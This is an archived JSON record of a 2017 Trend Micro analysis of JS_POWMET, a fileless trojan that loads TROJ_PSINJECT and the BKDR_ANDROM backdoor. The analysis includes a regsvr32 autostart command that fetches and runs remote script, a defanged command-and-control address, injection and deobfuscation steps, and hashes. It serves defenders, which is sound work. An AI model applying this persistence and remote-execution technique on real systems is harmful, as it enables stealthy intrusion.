{
	"id": "5bda1e11-8757-4a5d-a07c-d3c5083a58fa",
	"created_at": "2026-04-06T00:21:49.216705Z",
	"updated_at": "2026-04-10T03:21:00.487258Z",
	"deleted_at": null,
	"sha1_hash": "ff5ad7f491a89aa1536b6ebc66c0f590e0aae03a",
	"title": "A Look at JS_POWMET, a Completely Fileless Malware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 68879,
	"plain_text": "A Look at JS_POWMET, a Completely Fileless Malware\r\nBy By: Michael Villanueva, Byron Gelera Aug 02, 2017 Read time: 3 min (937 words)\r\nPublished: 2017-08-02 · Archived: 2026-04-05 16:22:34 UTC\r\nAs cybercriminals start to focus on pulling off attacks without leaving a trace, fileless malwarenews article, such\r\nas the recent SOREBRECT ransomware, will become a more common attack method. However, many of these\r\nmalware are fileless only while entering a user’s system, as they eventually reveal themselves when they execute\r\ntheir payload. Attacks that use completely fileless malware are a rare occurrence, so we thought it important to\r\ndiscuss a new trojan known as JS_POWMET (Detected by Trend Micro as JS_POWMET.DE), which arrives via\r\nan autostart registry procedure. By utilizing a completely fileless infection chain, the malware will be more\r\ndifficult to analyze using a sandbox, making it more difficult for anti-malware engineers to examine.\r\nGiven that our Smart Protection Network(SPN) data reveals a previously detected backdoor which is thought to be\r\nrelated to JS_POWMET affecting APAC the most, with almost 90% of the infections coming from the region, the\r\nfileless attack can also be considered to be affecting the same region.\r\nTechnical Details\r\nintel\r\n Figure 1. JS_POWMET infection Diagram\r\nAlthough the exact method of arrival is still not certain, it is likely that the trojan is downloaded by users that visit\r\nmalicious sites, or as a file that is dropped by other malware. What is clear about this malware is that the\r\nfollowing registry has already been changed by the time it is downloaded into the system.\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run COM+ = “regsvr32 /s /n\r\n/u /i:{Malicious URL, downloads JS_POWMET} scrobj.dll”\r\nJS_POWMET is downloaded via an autostart registry entry (shown above). Here are the descriptions for the\r\nfollowing parameters used by “regsvr32”:\r\n1. /s = silent option for regsvr32\r\n2. /n = tells regsvr32 not to use DllRegisterServer\r\n3. /u = Unregister server/object\r\n4. /i  = used for passing an optional parameter (ie. URL) to DLLinstall\r\n5. scrobj.dll = Microsoft’s Script Component Runtime\r\nIn this method, a URL was given to regsvr32 as a parameter, which will make regsvr32 capable of fetching the file\r\n(XML with malicious JavaScript) found on the URL. Due to this routine, regsvr32 will become capable of\r\nexecuting arbitrary scripts without saving the XML file on the machine/system. In particular, whenever the\r\nhttp://blog.trendmicro.com/trendlabs-security-intelligence/look-js_powmet-completely-fileless-malware/\r\nPage 1 of 3\n\naffected machine starts up, it will automatically download the malicious file from its Command \u0026 Control (C\u0026C)\r\nserver.\r\nOnce JS_POWMET is executed, it will then download another file known as TROJ_PSINJECT (Detected by\r\nTrend Micro as TROJ_PSINJECT.A). This file is a Powershell script that runs under the process of Powershell.\r\nTROJ_PSINJECT will connect to the following website:\r\nhxxps://bogerando[.]ru/favicon\r\nThis allows TROJ_PSINJECT to download a normal file called favicon. The favicon file will then be decrypted\r\nand injected into its process using ReflectivePELoader, which is used for injecting EXE/DLL files.\r\nTo deobfuscate the malware code, it uses the following techniques. Initially, the malware contains Base64 Strings\r\nthat will be decoded and decrypted using the RC4 key (which is hard-coded into the malware code). The resulting\r\ndecrypted strings will be a GZIP-compressed string that is decompressed by the malware itself using the GZIP-decompression routine. This results in the codes for the ReflectivePELoader function that will be used to load the\r\ndecrypted downloaded file.\r\nFavicon will also be decrypted using the aforementioned RC4 key, resulting in a malicious DLL file known as\r\nBKDR_ANDROM (Detected by Trend Micro as BKDR_ANDROM.ETIN). Again, this part of the process is also\r\nfileless; the file will not be saved into the machine but rather injected into the powershell.exe process. All of these\r\nroutines will be executed by the malware using PowerShell commands.\r\nintel\r\nFigure 2. TROJ_PSINJECT code showing the deobfuscation process\r\nBKDR_ANDROM will terminate powershell.exe if it is found running in the system. In addition, it will also\r\ngather the following data:\r\nRoot Volume Serial Number\r\nOperating System Version\r\nLocal IP Address\r\nAdministrator privileges\r\nThe malware will add registry entries into the system to ensure that it always executes during startup. The\r\nautostart registry entry is capable of decoding the Base64-encoded PowerShell command, which will be used to\r\ndecrypt the encrypted binary data (also found on the registry, added by the malware) that will result in the\r\nmalicious codes of BKDR_ANDROM. After the decryption process, it will then execute the decrypted malicious\r\ncodes. While the final payload in this case consists of common routines of BKDR_ANDROM, there is also a\r\nchance that future malware authors might make use of other malware as payload.\r\nConclusion\r\nWhile JS_POWMET and the rest of the files it downloads are relatively light in terms of impact, this malware\r\ndemonstrates the lengths cybercriminals will go to avoid detection and analysis. It also shows that even relatively\r\nuncommon infection methods involving fileless malware continually evolve. Organizations and users should\r\nhttp://blog.trendmicro.com/trendlabs-security-intelligence/look-js_powmet-completely-fileless-malware/\r\nPage 2 of 3\n\nalways look beyond the obvious malware files and always be on the lookout for “stealthy” malware that manages\r\nto slip into the system virtually unnoticed. One of the more effective methods for mitigating the effects of fileless\r\nmalware would be to limit access to critical infrastructure via container-based systems that separate endpoints\r\nfrom the most important parts of the network. For this specific malware, IT professionals can also look into\r\ndisabling Powershell itself to help mitigate the effects of JS_POWMET and its various payloads.\r\nTrend Micro Solutions\r\nFileless malware is designed to make detection by security solutions more difficult, as such organizations need to\r\nimplement multilayered solutions that can help in detection. Trend Micro endpoint solutions such as Trend\r\nMicro™ Securityproducts, OfficeScanproducts, and Worry-Free Business Securityworry free services\r\nsuites include behavior monitoring to detect this type of malware; this can help organizations look out for\r\nmalicious behavior that can block the malware before the behavior is executed or performed.\r\nThe following hashes were used for this article:\r\n7004b6c1829a745002feb7fbb0aad1a4d32c640a6c257dc8d0c39ce7b63b58cc (TROJ_PSINJECT.A)\r\ne27f417b96a33d8449f6cf00b8306160e2f1b845ca2c9666081166620651a3ae (JS_POWMET.DE)\r\nbff21cbf95da5f3149c67f2c0f2576a6de44fa9d0cb093259c9a5db919599940 (BKDR_ANDROM.ETIN)\r\nSource: http://blog.trendmicro.com/trendlabs-security-intelligence/look-js_powmet-completely-fileless-malware/\r\nhttp://blog.trendmicro.com/trendlabs-security-intelligence/look-js_powmet-completely-fileless-malware/\r\nPage 3 of 3",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"http://blog.trendmicro.com/trendlabs-security-intelligence/look-js_powmet-completely-fileless-malware/"
	],
	"report_names": [
		"look-js_powmet-completely-fileless-malware"
	],
	"threat_actors": [],
	"ts_created_at": 1775434909,
	"ts_updated_at": 1775791260,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ff5ad7f491a89aa1536b6ebc66c0f590e0aae03a.pdf",
		"text": "https://archive.orkl.eu/ff5ad7f491a89aa1536b6ebc66c0f590e0aae03a.txt",
		"img": "https://archive.orkl.eu/ff5ad7f491a89aa1536b6ebc66c0f590e0aae03a.jpg"
	}
}